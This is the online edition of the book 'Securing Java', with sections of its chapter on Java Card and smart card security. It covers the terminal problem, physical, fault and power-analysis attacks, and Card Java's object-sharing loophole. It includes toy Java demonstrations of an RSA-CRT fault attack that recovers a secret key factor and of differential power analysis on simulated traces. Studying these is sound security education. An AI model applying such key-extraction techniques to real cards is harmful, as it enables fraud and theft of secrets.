Table of Contents
Preface

Chapter One
Mobile Code and Security: Why Java Security is Important
Chapter Two
The Base Java Security Model: The Original Applet Sandbox
Chapter Three
Beyond the Sandbox: Signed Code in JDK 1.2
Chapter Four
Malicious Applets: Avoiding the Common Nuisances
Chapter Five
Attack Applets: Exploiting Holes in the Security Model
Chapter Six
Securing Java: Improvements, Solutions, and Snake Oil
Chapter Seven
Java Security Guidelines: Developing and Using Java More Securely
Chapter Eight
Java Card Security: How Smart Cards and Java Mix
Chapter Nine
The Future of Java Security: Challenges Facing Mobile Code
Appendix A
Frequently Asked Questions: Java Security FAQ and Java versus ActiveX
Appendix B
Java Security Hotlist
Appendix C
How to Sign Java Code
References
Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Order Securing Java (ISBN: 047131952X) from any of the following sources: Amazon.com, Barnes & Noble, Books-A-Million, Borders, or John Wiley & Sons -- or automatically search for the lowest price on more than 25 online bookstores.
Welcome to the online version of Securing Java: Getting Down to Business with Mobile Code. Putting a 300+ page book online is no easy task -- but hopefully navigating through it is. The online version of this book has been designed to work with you rather than against you to find information and read the text. Generally, navigation should be pretty self-explanatory, but if you need a hand, here is a quick rundown of how things are laid out:
● There is a chapter bar at the bottom of each page that allows you to jump to the front of any chapter in the book, as well as to other main sections such as the table of contents.
● When you get into reading the book itself, each front chapter page has a list of subsections that you can jump to. You can also use the arrows at the top of each page to go to the previous or next page in the book. Keep in mind that one web page does not equal one physical page of the book; one web page usually corresponds to one full subsection of a chapter.
● You can search the text of the book from almost anywhere via the search box at the bottom of the page.
● Clicking on a footnote number will bring up a new window with the footnote. This works in Netscape and Opera, though Internet Explorer will open the footnote in the same window -- if you use IE, use the "Back" button to return to the chapter.
If you find a problem, please e-mail the Webmaster.
● Read Securing Java on the Web
● About the Web Edition
● Excellent Reviews
● The Java Security Website
● About the Authors
● Trade Articles: By the Authors / Featuring the Authors
● Java Security Hotlist

Published by: John Wiley & Sons, Inc. (ISBN: 047131952X)
Web site hosted by: Cigital
About the Web Edition
by Ryan A. MacMichael

A little under ten years ago, there was a company betting its livelihood on the popularity of electronic books. They put out a handheld device that cost a few hundred dollars and offered e-books and e-magazines on disk. This was before the Internet had become a household necessity, and the idea did not go over very well at all -- they disappeared in less than a year. Why did they go under? For some of the obvious reasons: poor screen resolution, the general clunkiness of the reader, and the simple fact that it just didn't feel right to need batteries to read a book at the beach. It was pretty clear then that electronic books were not going to be a serious competitor to the physical book anytime soon. Cliff Stoll felt much the same way, as he discussed at length in Silicon Snake Oil: Second Thoughts on the Information Highway.

I'd say, unequivocally, that the world is not ready for a handheld device like the one described above to out-and-out replace the physical book. However, with the extreme popularity of the Web, the release of an online book is a wonderful complement to the release of its physical counterpart:
● Books don't have a satisfying search capability built into them. The index is usually somewhat helpful, and a "top-level" navigation system like the table of contents works to a point, but what about when you're looking for that one small section you read a few days ago? The online book allows a reader to jump on the Net and run a quick search through the entire text.
● From a promotional standpoint, the online book makes deciding to purchase a text online as easy as reading a few passages of the same book in a physical store. Unlike the selected passages that book mega-sites like Amazon may provide, having the entire text of a book online lets consumers see for themselves, without leaving home, whether it really fills their needs before ordering the paper version.
● And the importance of a book existing in a hypertext Web space can't be stressed enough. The very foundation of the WWW is the ability to use hypertext to a degree previously only dreamed of. The phrase "see also: section x in chapter y" works as a link directly to the cross-reference. A categorized list of links (like those in the appendices of this book) is much more accessible and usable, especially when accompanied by a searchable index. And the details of a footnote or citation can be easily accessed through an unobtrusive pop-up window.

When you add a search facility, worldwide accessibility, and hypertext to a physical book, the additional value is immeasurable. With a site supporting a technical book like Securing Java, the benefits are immediately obvious:
● Searching the online text for "smart card SSL" is a lot quicker than jumping to the table of contents, choosing Chapter 8, and then figuring out manually which sections refer to the use of SSL with Java smart cards.
● Now imagine you're at work and you read a feature about Securing Java in one of the weekly techie trade rags. You swing by Amazon and there's minor information, but not much, and you doubt you'll have time to stop at Borders on the way home to take a look at the book. Swing by the website and you can thumb through the book, so to speak, as if you were lounging in one of those comfy chairs at the book superstore.
● Lastly, in a book like Securing Java, direct links to lengthy research papers provide an added dimension that a URL on paper can't. Being able to quickly download a PostScript version of a doctoral thesis adds a new dimension to what you're reading online in another window.
The process of writing a book, especially a non-fiction text, is changing -- the author must consider providing Web-based resources as seriously as adding an appendix. Whether these online resources are a list of links, text corrections and updates, or a full, searchable online text depends on the nature of the book, but it's clear that at least some level of support and information beyond traditional paper publishing is becoming necessary. Hopefully, by example, the Securing Java site will help demonstrate this importance. We hope you find the online version of Securing Java a useful supplement to the physical edition. We invite you to show your support for the effort put into the online version by purchasing the book.
Ryan MacMichael is the Webmaster at Reliable Software Technologies in Sterling, VA, and designed the online version of Securing Java. He has been previously published in BBS Callers Digest and spends too much of his spare time on perhaps the world's largest personal Web site. You can reach Ryan with any problems or comments at
[email protected].
The Future of Java Security: Challenges Facing Mobile Code
Now that you have reached this chapter, you have learned many things about today's Java security model. One of the key lessons emphasized throughout the book is that the current Java security model is more complex than ever. This makes Java security both difficult to understand and difficult to use securely. The people at Sun Microsystems and other Java licensees have gone to great lengths to provide a secure platform for mobile code and a set of tools with which to build security-critical applications. To some extent they have succeeded, as Java is more secure by far than any other mobile code architecture. The security model is complex; however, there are many things you can do to make your use of Java more secure. In addition, there are a number of challenges that remain for Java.
Chapter Nine Sections
1. Lessons from the Trenches
2. Challenges for Secure Mobile Code
3. Software Assurance for Java
4. Should You Use Java?
Java Card Security: How Smart Cards and Java Mix
Section 8 -- Managing Risks
New functionality in the form of smart cards promises to help solve some tough, real-world problems and address important security concerns. With new functionality, however, comes new risks. The security dilemma remains: How much risk are you willing to take, and to what benefit?
Java Card Security: How Smart Cards and Java Mix
Section 7 -- How Does the Use of Java Impact Smart Card Security?
Much of the base security model found in Java's JDK 1.0.2 (and explained in Chapter 2) is not present in Card Java. For example, Card Java has no Security Manager class. This means the whole concept of security for Card Java applets is significantly different from the case of applets running on a standard browser-based VM. Fortunately, some of Card Java's "missing parts" may actually enhance the security situation; unfortunately, some of the changes introduce new security risks.
How Card Java Lessens Security Risks

One of the most difficult problems in Java security is figuring out how to preserve type safety while at the same time allowing dynamic class loading (see Chapter 2). If you can confuse the VM about the types of objects it is manipulating, you can break the security model. In its current form, Card Java takes care of this problem by removing dynamic class loading, making type safety easier to enforce. Class loading has always been problematic in Java and has introduced a number of serious security holes. Because it has no dynamic class loading, Card Java is less risky than regular Java from this perspective.

Another constraint imposed by Card Java, the lack of threading, makes security analysis of applet code much easier than it is normally. Threading is difficult both to implement properly and to use properly, and it imposes a fair amount of overhead in the VM, significantly increasing the VM footprint. Although there can be multiple applets resident on the same smart card, Card Java systems allow only one applet to be selected at a time. (The multiple-resident-applications concept introduces risks of its own, which we address later.)
How Card Java Increases Security Risks

The lack of threads and the absence of dynamic class loading affect security in a positive way, but the opposite effect can be seen with other Card Java features. In other words, the removal of some features of Java (clearly intended to make the migration to Card Java possible) may introduce new security problems. The risks introduced involve:
● Lack of garbage collection
● Exception propagation problems
● Multiple applications and applet firewalling
● Object-sharing loopholes
● Access to native code
These problems and their risks are discussed next.

Garbage collection is a good example of a feature whose absence has a security impact. Without a system for freeing allocated memory, the problem of denial-of-service attacks is exacerbated. The Card Java 2.0 specification does not require implementation of garbage collection on a card (in fact, implementing garbage collection on a card would be no small feat). As a result, even subtle programming errors can wreak havoc on a smart card. Memory leaks are a classic problem in languages such as C++ that do not support automatic garbage collection [Hastings and Joyce, 1992]. (The term memory leak refers to memory that is allocated but never reclaimed, so that free memory is steadily consumed as objects are created and abandoned.) Since Card Java does not support garbage collection, logic errors in applet code may over time exhaust free memory, rendering the card useless. This problem is especially acute on cards with limited memory resources. A closely related issue is the "dangling reference" problem, in which a program frees memory even though it still holds a pointer to that memory. The freed memory may be recycled for another purpose, and the old "dangling" pointer may then be used, resulting in memory corruption. Unfortunately, garbage collection is expensive in terms of both time and computational resources. Nevertheless, the risk of memory leaks is real. Ensuring that these kinds of errors do not occur requires extensive testing and analysis of Card Java applet code.

Exception propagation is an interesting issue for Card Java as well, since uncaught exceptions could lead to a card being muted (disabled for normal use). The potentially fatal effect of unhandled exceptions implies another significant exposure to unintended denial of service, once again resulting from subtle programming errors. As with memory exhaustion, ensuring that these kinds of errors do not occur requires extensive testing and analysis of Card Java applet code.

Since Card Java allows multiple applications to be resident on the same smart card, there is a risk of interapplication attacks. This risk is especially relevant in situations where applets may be provided by competing vendors. Card Java defines applet firewalls meant to protect applets from one another, although it is not exactly clear what technology underlies this terminology. It appears that the main protections between applets are related to memory management; in particular, applets are not allowed to access memory arbitrarily on the card. By default, they can only access objects that they own (which are mapped into card memory during applet installation). It is clear that the memory protection mechanisms must be perfectly implemented to allow safe use of multiple applets. Plans are in the works for smart card applications that cooperate with each other. Imagine, for example, a card that works both as a debit card and as a frequent flyer card. Such plans may introduce more security risk than they are worth.

One feature that is in high demand in systems with multiple applications is object sharing. Card Java 2.0 includes an object-sharing approach that includes a loophole. The current approach is described as follows:

The JCRE keeps track of the currently selected applet as well as the currently active applet. The currently active applet value is referred to as the applet execution context. When a virtual method is invoked on an object, the applet execution context is changed to correspond to the applet that owns that object. When that method returns, the previous context is restored. Invocations of static methods have no effect on the applet execution context. The applet execution context and sharing status of an object together determine if access to an object is permissible [Sun Microsystems, 1997].

To illustrate the implications of this approach, consider an example with three applets named A, B, and C, as shown in Figure 8.3. Applet A shares an object it owns, x, with applet B. Applet B shares an object it owns, y, with applet C. A virtual method y.bar in the object owned by B (and shared with C) invokes a virtual method x.foo in the object owned by A. Now if applet C is selected, it has permission to invoke virtual methods of the object owned by applet B, including the one that in turn invokes the virtual method in an object owned by applet A. In other words, C indirectly invokes x.foo.
Figure 8.3 Sharing a virtual method with another applet is tantamount to allowing that applet complete control over the method. The problem is illustrated here: Applet A may think it is sharing method foo() only with Applet B, but Applet B can in turn share the method (through its own method bar()) with Applet C. If A doesn't want to share with C, this may be a problem. (The arrow between Applets B and C represents share(y, C).)
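To make the scenario concrete, here is the same delegation problem sketched in ordinary Java. This is our illustration of the logic described above, not Card Java code: the class and method names are invented, and real Card Java sharing goes through the JCRE's object-sharing mechanism and context switching rather than plain object references.

// Illustrative only: plain Java standing in for Card Java's sharing mechanism.
// Applet A believes it shares x only with B, but B can re-export access to C.
class ObjectX {
    void foo() { System.out.println("sensitive operation owned by A"); }
}

class ObjectY {
    ObjectX x;                                   // reference to A's shared object
    void bar() { x.foo(); }                      // y.bar invokes x.foo
}

class AppletA {
    private ObjectX x = new ObjectX();           // A owns x
    ObjectX shareWithB() { return x; }           // A intends: share(x, B)
}

class AppletB {
    private ObjectY y = new ObjectY();           // B owns y

    AppletB(ObjectX sharedX) { y.x = sharedX; }
    ObjectY shareWithC() { return y; }           // B intends: share(y, C)
}

class AppletC {
    void run(ObjectY sharedY) { sharedY.bar(); } // C reaches x.foo indirectly
}

public class SharingLoopholeDemo {
    public static void main(String[] args) {
        AppletA a = new AppletA();
        AppletB b = new AppletB(a.shareWithB()); // share(x, B)
        AppletC c = new AppletC();
        c.run(b.shareWithC());                   // share(y, C): C now triggers x.foo
    }
}

Nothing Applet A does can prevent Applet B from re-exporting bar(), and through it foo(), to Applet C; the only defense is for A to share x explicitly with every applet that might ever need access, directly or indirectly.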
In short, if virtual methods are used, granting an applet permission to access an object amounts to also granting that applet the ability to export indirect access to that object to any other applet. This clearly weakens any assurance about the protection of an object. For static methods, such access is prohibited, since static methods do not change the applet context. Restricting virtual methods in the same way that static methods are restricted may add some complexity to sharing schemes. The upshot of such a change would be that an applet would be forced to share an object explicitly with all other applets that directly or indirectly need to be granted access permission.

By far the biggest risk presented in the design of Card Java is the potential ability for a vendor to add and use Native methods on the platform. Obviously, this compromises portability (applets that use Native methods will not be automatically portable to other cards), and it may expose the card to dangerous code that exists outside the applet firewalls. In fact, if Native methods are available, the concept of firewalls deteriorates. Native code is not restricted by the JCRE's mediation of access, and misuse is possible. The very real security concern is that an attack applet will make use of Native code to carry out operations that would otherwise be stopped by the JCRE. When Native code executes, all bets are off for the Java Virtual Machine and its protection mechanisms. Native code in applets completely breaks the idea behind Java security. Attack applets are likely to make use of Native method calls.

The five new risks we have covered were introduced into Java with its transformation to Card Java. Although Card Java certainly presents an intriguing new set of risks in terms of security, it does nothing to address several important fundamental security concerns associated with smart cards, including the problem of physical attacks and the terminal problem (both discussed earlier in the chapter). It is important to keep in mind that the non-Java-related problems have a real impact on card security and that they are not solved by Card Java.
Java Card Security: How Smart Cards and Java Mix
Section 6 -- What Role Can Smart Cards Play in E-Commerce Systems?
E-commerce means different things to different people. Some people, for example, limit the meaning of e-commerce to commerce conducted over the Internet and the Web. For the purposes of this chapter, we're going to use the term more widely. So, by e-commerce, we mean everything from electronic business-to-business traffic (for example, Electronic Data Interchange), through Internet-based systems, to any system in which money is represented as bits. Under this admittedly overly broad definition, almost the entire economy is touched by some aspect of e-commerce. We're intentionally invoking this broad definition to emphasize the utility of smart cards for transacting business.

Smart cards are seemingly an excellent medium for carrying password-protected personal data. Private information such as medical records or secret crypto keys can be stored on a card in a form accessible only to the card carrier (or at least someone who knows the right secrets). In addition, smart cards can store value. Card carriers can decide with whom to share data and with whom to transact business, and use their cards only with those vendors they choose to trust.

The most common form of smart card for commerce is the register-based, stored-value card. Somewhat ironically, one of the most unfortunate consequences of this kind of smart card is that secret keys on the card are known only to the issuing bank and must remain secret from the owner. If the card owner can somehow retrieve a secret key, then he or she can mint electronic cash. In light of the physical attacks sketched earlier in the chapter, this is a serious problem.

Multiple-application smart cards like the Java Card should directly impact the marketability of smart card technology for e-commerce. When a single card can replace the many cards most consumers carry around today, people are likely to want it. Imagine a single card that both holds personal information (such as driver's license, social security, medical information, auto insurance, voter registration, workplace ID, Web site passwords, and keys for making digital signatures and encrypting data) and also provides multiple functions (working as a phone card, a charge card for a store, a video rental credit tracker, a credit card, a debit card, and an electronic cash repository).

Leading Web vendors like Netscape are developing APIs for smart card interfaces. The idea is to use a smart card to store cryptographic data for use with existing protocols such as SSL. This will allow Netscape users to interact over the Web with a well-understood (and widely accepted) protocol. Microsoft is also building smart card interfaces into its products.

The first use of smart cards for e-commerce is likely to be as a key/identity repository. In this case, smart cards act as highly portable hardware tokens that can be uniquely identified. Smart cards can store personal digital certificates for use with the SET protocol and other authentication-based protocols [Ghosh, 1998]. This could make it possible to carry out Web-based commerce on Internet kiosk systems of the sort occasionally found in airports and coffee shops.
Java Card Security: How Smart Cards and Java Mix
Section 5 -- How Secure Are Smart Cards?
Before we dig into the security implications raised by putting a Java VM on a smart card, we need to address the issue of basic smart card platform security. Smart cards are funny things. Depending on how they're used, smart cards can sometimes be meant to keep secrets from the very people who carry them around and use them. Consider, for example, a smart card that stores monetary value in an internal register. If the card user can figure out a way to change the value of the register outside of traditional means, he or she might be able to mint money! Smart cards like this make tempting targets for bad guys. Because smart cards are often used in security-critical situations, they have undergone a fair amount of scrutiny from security researchers. Two main results are worth considering before we get into security issues specific to Java: 1) the terminal problem, and 2) physical attacks on the card.
The Terminal Problem

Smart cards need a way to interact with their users. Since there is no built-in display capability in most cards, the CAD must take on this responsibility. Any display used during critical transactions, such as transferring money, needs to have two properties: the display must be trustworthy, and it must be unspoofable. Making sure a terminal presents proper and trustworthy information to a user is known as the terminal problem.

The terminal problem is really a trust issue. How is a card user to be sure that the card is doing what it is supposed to be doing during a transaction? How can a card user check to see whether account balances (for example) have been properly debited or credited? The problem is that cards are very much black boxes.
Many systems now on the drawing board include the use of personal computers as client-side CADs. Consumers will use a PC to interact with the smart card and to address the concerns raised by the terminal problem. The problem is that PCs are notoriously insecure, especially when they're used to exchange lots of documents and programs, as most consumers do. If you use your computer this way, you're taking on a great deal of risk. One direct consequence of PC untrustworthiness is that a PC cannot solve the terminal problem: if your PC can't be trusted, how can you believe that what it is telling you on behalf of your smart card is correct?

In fact, one excellent reason for using smart cards at all is that PCs can't be trusted. The reasoning goes that it is better to store secrets like PINs, sensitive personal data, and private keys on a smart card than on a PC. That way, if the PC is compromised, your secrets can't be so easily stolen. However, this leaves us with the terminal problem.

A scenario can make this more concrete. Imagine that someone has tampered with your Web browser, either by hacking into your PC or by tampering with the Web browser executable before you downloaded it. Clearly you can't trust such a browser not to steal or rewrite data on the way from your smart card to you. Some things that might happen are:
● The smart card requires a PIN before it can be used. Through a browser interface, you are queried for your PIN (which you faithfully enter). The corrupted browser sees the PIN go by and stores it for later illicit use.
● The PC is used as a listening post to carry out capture/replay attacks against the smart card (these kinds of attacks often work against cryptographic protocols unless the protocols are carefully designed to prevent them).
● The PC steals the private key off the smart card and is able to "legally" represent you by digital signature.
What is needed is a trusted display. Some researchers have suggested that PDAs such as 3Com PalmPilots might serve as trusted displays. The idea is that the PDA can interact directly with the user during security-critical operations like PIN input. In fact, the PDA can replace the smart card entirely since it can easily carry out all the required computations. (PDAs are probably too unwieldy for this idea. It's much easier to slide a smart card into your wallet than a PalmPilot.)

Unfortunately, there is not much reason to trust a PalmPilot much more than a PC these days. The problem is that newer PalmPilots and other PDAs are designed to network with PCs directly (sometimes even using a TCP/IP stack). That's good news if you want to transfer data to and from your PDA, but it's risky. Just like a PC, a PalmPilot is probably insecure if you frequently download programs onto it. Crackers are currently devising hacks that work against PalmPilots.

In the end, we're stuck with the terminal problem. As smart cards move into more widespread use on PCs, PC-based interfaces will be especially susceptible to this problem. An insecure Windows 95 OS in concert with a Web browser should not be trusted to display critical information to a smart card user. A PDA might do the trick, but is likely to carry similar risks.
Physical Attacks on Smart Cards

The most obvious and direct attack on a smart card is a physical attack on the card itself. In the case of a stored-value card, this sort of attack may even be carried out by the owner of the card. Physical attacks attempt to reverse engineer the card and determine the secret key(s). Such attacks have been demonstrated in practice against commercial secure smart card chips, most notably by three groups of researchers: Dan Boneh, Richard DeMillo, and Richard Lipton of Bellcore; Ross Anderson of Cambridge and Markus Kuhn of Purdue; and Paul Kocher and colleagues of Cryptography Research, Inc.
Boneh, DeMillo, and Lipton

Boneh, DeMillo, and Lipton, three Bellcore researchers, published a paper called On the Importance of Checking Cryptographic Protocols for Faults in which they pointed out that an adversary who can introduce computational errors into a smart card can deduce the values of cryptographic keys hidden in the smart card [Boneh, et al., 1997]. The surprising part is that an attacker can do this even without precisely controlling the nature of the errors or even the exact timing of the errors. By comparing the result of an erroneous encryption with the result of a correct encryption of the same data, the attacker can learn something about the correct encryption key. By doing enough of these comparisons, the attacker can learn enough information to deduce the entire encryption key.

How does the attacker introduce errors? There are plenty of ways. The attacker can subject the smart card to fluctuations in temperature, input voltage, or clock rate; point a radiation source at the card; or hit the card with a rubber mallet. Anything that is likely to cause voltages inside the card to fluctuate will do. Biham and Shamir later generalized this attack with a technique called Differential Fault Analysis, which works against a wide range of cryptographic algorithms. The upshot of all this is that unless a smart card cryptography mechanism is very carefully designed, any secret keys stored inside the card might be extracted by a determined attacker.
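To give a flavor of how powerful this observation is, here is a small, self-contained sketch of one well-known concrete instance of the idea: an RSA signature computed with the Chinese Remainder Theorem (CRT), the usual speedup on small processors. The code is ours, not taken from the Bellcore paper, and it uses deliberately tiny toy key sizes. If a fault corrupts only the mod-q half of the computation, the difference between a correct and a faulty signature of the same message is divisible by p but not by q, so a single gcd with the public modulus recovers a secret prime factor.

import java.math.BigInteger;
import java.security.SecureRandom;

public class FaultAttackToy {
    public static void main(String[] args) {
        SecureRandom rnd = new SecureRandom();
        BigInteger one = BigInteger.ONE;

        // Toy RSA key (much too small for real use).
        BigInteger p = BigInteger.probablePrime(256, rnd);
        BigInteger q = BigInteger.probablePrime(256, rnd);
        BigInteger n = p.multiply(q);
        BigInteger phi = p.subtract(one).multiply(q.subtract(one));
        BigInteger e = BigInteger.valueOf(65537);
        BigInteger d = e.modInverse(phi);
        BigInteger m = new BigInteger(255, rnd);              // message representative

        // Correct CRT signature: combine m^d mod p and m^d mod q.
        BigInteger sp = m.modPow(d.mod(p.subtract(one)), p);
        BigInteger sq = m.modPow(d.mod(q.subtract(one)), q);
        BigInteger s = crt(sp, sq, p, q);

        // Faulty signature: a glitch corrupts only the mod-q half.
        BigInteger sqBad = sq.add(one).mod(q);
        BigInteger sBad = crt(sp, sqBad, p, q);

        // The attacker needs only the two signatures and the public modulus.
        BigInteger factor = s.subtract(sBad).gcd(n);
        System.out.println("recovered factor equals p? " + factor.equals(p));
    }

    // Chinese Remainder Theorem combination (Garner's formula).
    static BigInteger crt(BigInteger xp, BigInteger xq, BigInteger p, BigInteger q) {
        BigInteger h = q.modInverse(p).multiply(xp.subtract(xq)).mod(p);
        return xq.add(h.multiply(q));
    }
}

Nothing in the final attack step uses the private key: the gcd needs only the two signatures and the public modulus, which is exactly why induced faults are so dangerous for cards that compute signatures internally.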
Anderson and Kuhn

In a paper entitled Tamper Resistance -- A Cautionary Note (www.cl.cam.ac.uk/users/cm213/Publications/tamper.html), Anderson and Kuhn point out that "smart cards are broken routinely" and that, to the extent that their secure use requires tamper resistance, smart cards "should be treated with circumspection." The paper describes a number of smart card attacks, many of which can be carried out by amateur attackers with very limited resources [Anderson and Kuhn, 1996]. Attacks described include voltage manipulation, temperature manipulation, chip removal (for easier probing), UV light attacks, and microprobing. More sophisticated attacks requiring professional equipment and materials involve uncovering the layers of a chip by etching, discerning chip behavior by advanced infrared probing, and reverse-engineering chip logic. The somewhat gloomy conclusion is that, at best, chip designers can only impose costs and delays on attackers, never providing guaranteed security. Many businesses that rely on smart card security realize this and do all they can to manage the risks prudently. Users should do the same.

Some caveats: the Anderson and Kuhn work is somewhat dated and is based on attacks carried out in the lab against conventional micro-controllers, which are usually much simpler than today's smart cards. Micro-controllers provide a great deal of open access to potential attackers since they are meant to be interactively programmed. For example, micro-controllers often provide an interface for external memory; generally speaking, smart cards don't have this feature. Thus they provide less of a beachhead for attacks. Of course, Java complicates this line of reasoning somewhat. Card Java provides a platform that is meant to be programmable in the sense that applets may be loaded onto a smart card after it is issued. Mechanisms for loading new code onto a smart card provide a good starting point for an attacker.
Differential Power Analysis

In 1998, researchers at Cryptography Research, Inc., led by Paul Kocher, publicly announced a new set of attacks against smart cards called Differential Power Analysis (DPA). DPA can be carried out successfully against most smart cards currently in production. DPA is a complicated attack that relies on statistical inferences drawn from power consumption data measured during smart card computation. The equipment required to perform DPA is simple: a modified smart card reader and some off-the-shelf PCs. The algorithm itself is quite complex, but details have been widely published.

Chips inside a smart card use different amounts of power to perform different operations. By hooking a card up to an oscilloscope, a pattern of power consumption can be measured. Particular computations create particular patterns of spikes in power consumption. Careful analysis of the peaks in a power consumption pattern can lead to the discovery of information about secret keys used during cryptographic computations. Sometimes the analysis is straightforward enough that a single transaction provides sufficient data to steal a key. More often, thousands of transactions are required. The types of sensitive information that can leak include PINs and private cryptographic keys. Figure 8.2 is a conceptual diagram of DPA.
Figure 8.2 Differential Power Analysis. Paul Kocher and his colleagues at Cryptography Research devised a monitoring attack on smart cards based on information leaked through card power consumption. This figure used by permission from Cryptography Research.
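To give a feel for the statistics involved, here is a toy sketch of the differential-trace computation at the heart of DPA. It is our own illustration, not Cryptography Research's algorithm: it fabricates noisy "power traces," partitions them according to a single predicted data bit, and subtracts the two group averages. Samples whose power consumption genuinely depends on that bit stand out as a spike, while unrelated samples average away; in a real attack the partitioning bit is derived from a guess about key material, and only correct guesses produce the spike.

import java.util.Random;

public class DifferentialTraceToy {
    public static void main(String[] args) {
        final int TRACES = 5000, SAMPLES = 40, LEAKY_SAMPLE = 23;
        Random rnd = new Random(1);

        int[] bit = new int[TRACES];                    // the data bit the card processes
        double[][] power = new double[TRACES][SAMPLES]; // simulated measurements

        // Simulate traces: mostly noise, but the leaky sample draws slightly
        // more power whenever the processed bit is 1.
        for (int i = 0; i < TRACES; i++) {
            bit[i] = rnd.nextInt(2);
            for (int t = 0; t < SAMPLES; t++) {
                power[i][t] = rnd.nextGaussian();
                if (t == LEAKY_SAMPLE && bit[i] == 1) power[i][t] += 0.5;
            }
        }

        // Differential trace: average of the "bit = 1" group minus the "bit = 0" group.
        double[] sum1 = new double[SAMPLES], sum0 = new double[SAMPLES];
        int n1 = 0, n0 = 0;
        for (int i = 0; i < TRACES; i++) {
            double[] dst = (bit[i] == 1) ? sum1 : sum0;
            for (int t = 0; t < SAMPLES; t++) dst[t] += power[i][t];
            if (bit[i] == 1) n1++; else n0++;
        }

        int peakAt = 0;
        double peak = 0;
        for (int t = 0; t < SAMPLES; t++) {
            double diff = Math.abs(sum1[t] / n1 - sum0[t] / n0);
            if (diff > peak) { peak = diff; peakAt = t; }
        }
        System.out.println("largest differential " + peak + " at sample " + peakAt);
        // Expect the peak at sample 23, the only sample with a data dependence.
    }
}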
Possible solutions include masking power consumption with digital noise or throwing random calculations into the mix. Another potential solution is randomizing the order of card computations so that, in the end, the same computation is performed using different patterns of primitives. All of these potential technological solutions are ways to mask the giveaway patterns in the power consumption of the card.

DPA is actually a variation on an earlier attack discovered by Kocher. The earlier attack exploited the fact that some operations require different amounts of time to finish, depending on which values they are computing. In the same way that DPA allows an attacker to piece together key information based on variations in power consumption, Kocher's timing attack allows an attacker to piece together a key based on variations in the amount of computing time required to encrypt various values.

One thing to note is that legitimate users of smart cards don't have to worry too much about DPA or timing attacks, because the attack requires physical access to the card itself. Unless you lose your card or insert it directly into an attacker's machine, there is not much threat that your card will be cracked. The main risk that DPA presents is to companies that must concern themselves with widespread fraud of the sort carried out by organized crime. The best approach is to assume information will leak from a smart card and design systems in such a way that they remain secure even in the face of leaking information. An approach of this sort may preclude smart card systems designed to do all processing offline without a centralized clearinghouse.

Detailed technical information about DPA can be found on the Web at www.cryptography.com/dpa/technical/index.html.
No Free Lunch

It should not be surprising that smart cards have their own set of risks -- 100-percent security is an unattainable goal. Once again, risk management and defensive design are optimal strategies.
Java Card Security: How Smart Cards and Java Mix
Section 4 -- How Can Java Fit on a Card?
Even a stripped-down version of Java and its accompanying VM requires a fair amount of computational power in order to work. To be capable of running Card Java, a smart card must have at least 16K of read-only memory, 8K of EEPROM, and 256 bytes of random access memory.

Given a Java Virtual Machine on a smart card, the number of possible new applications is mind-boggling. With an off-the-shelf (or off-the-Net) application development environment for Card Java, thousands of Java developers will be able to program smart cards. Gemplus and Schlumberger both distribute commercial Card Java environments. Of course, the memory and interface constraints of smart cards deeply affect programming style, testing concerns, and other aspects of program development.

Card Java has many features familiar to Java developers, especially those developers familiar with JDK 1.0.2. Card Java includes:
● Packages
● Dynamic object creation
● Virtual methods
● Interfaces
● Exceptions
Elements of Java that are not supported include:
● Dynamic class loading
● A security manager
● Threads
● Cloning
● Garbage collection
● Finalization
A number of limitations are also imposed on runtime card application (or cardlet) behavior. The "Java Card 2.0 Language Subset and Virtual Machine Specification," a Sun Microsystems document available on the Web at www.javasoft.com/products/javacard/index.html, describes the smart card version of Java in more detail.

In the current Card Java paradigm, applets live on a card forever once they are installed during a process commonly called personalization. More specifically, although an applet's byte code may stay on the card forever once it is masked onto a card, an applet can be marked as unavailable and thus be permanently disabled. All applets that will be used on a card are installed at one time, before the card is issued to a consumer. These applets are selected and deselected by the Java Card Runtime Environment (JCRE). The JCRE is made up of the Virtual Machine and the core classes of the Java Card API. It keeps track of applets that are selected and currently active. The JCRE is in this sense the card executive, receiving messages (known as APDUs) on the input lines and carrying out the appropriate activities, such as selecting an applet. Only one applet can run at a time in current Card Java implementations.

Future versions of Card Java are likely to allow applets to be loaded onto an existing card even after it has been issued to a consumer (much the same way that applet code is loaded into a browser's VM). This introduces a number of security risks, including the risk that downloaded applet code will behave maliciously (in the manner of the hostile applets detailed in Chapter 4, "Malicious Applets: Avoiding a Common Nuisance," and Chapter 5, "Attack Applets: Exploiting Holes in the Security Model") and the risk that poorly engineered code will disable or otherwise break the platform. Unlike VMs inside browsers, a smart card VM is not quite as easy to restart, nor are the security mechanisms as rigorous.

By this point, it should be clear that Card Java has important security implications. These implications take on even more importance when smart cards are used in e-commerce systems.
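To make the lifecycle concrete, here is a minimal cardlet sketch. It is our illustration, written against the javacard.framework API in the style of later Java Card releases (the 2.0 API differs in some details), and the class name, instruction byte, and toy "balance" behavior are invented for the example. Note that, because there is no garbage collector, any allocation belongs in the constructor run at installation time, never in the per-APDU path.

import javacard.framework.APDU;
import javacard.framework.Applet;
import javacard.framework.ISO7816;
import javacard.framework.ISOException;

public class BalanceApplet extends Applet {
    private static final byte INS_GET_BALANCE = (byte) 0x30;   // hypothetical instruction

    private short balance;          // persistent state, lives in EEPROM

    private BalanceApplet() {
        balance = 0;                // allocate and initialize once, at installation
        register();                 // hand the new instance to the JCRE
    }

    // Called by the JCRE once, when the applet is installed (personalization).
    public static void install(byte[] bArray, short bOffset, byte bLength) {
        new BalanceApplet();
    }

    // Called by the JCRE for every APDU addressed to this applet while it is selected.
    public void process(APDU apdu) {
        if (selectingApplet()) {
            return;                 // nothing to do for the SELECT command itself
        }
        byte[] buf = apdu.getBuffer();
        switch (buf[ISO7816.OFFSET_INS]) {
            case INS_GET_BALANCE:
                buf[0] = (byte) (balance >> 8);
                buf[1] = (byte) balance;
                apdu.setOutgoingAndSend((short) 0, (short) 2);
                break;
            default:
                ISOException.throwIt(ISO7816.SW_INS_NOT_SUPPORTED);
        }
    }
}

The JCRE calls install() during personalization and thereafter routes every APDU for the currently selected applet to process(); an uncaught exception escaping process() is exactly the kind of programming error that can leave a card muted.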
Java Card Security: How Smart Cards and Java Mix
Section 3 -- Why Put Java on a Smart Card?
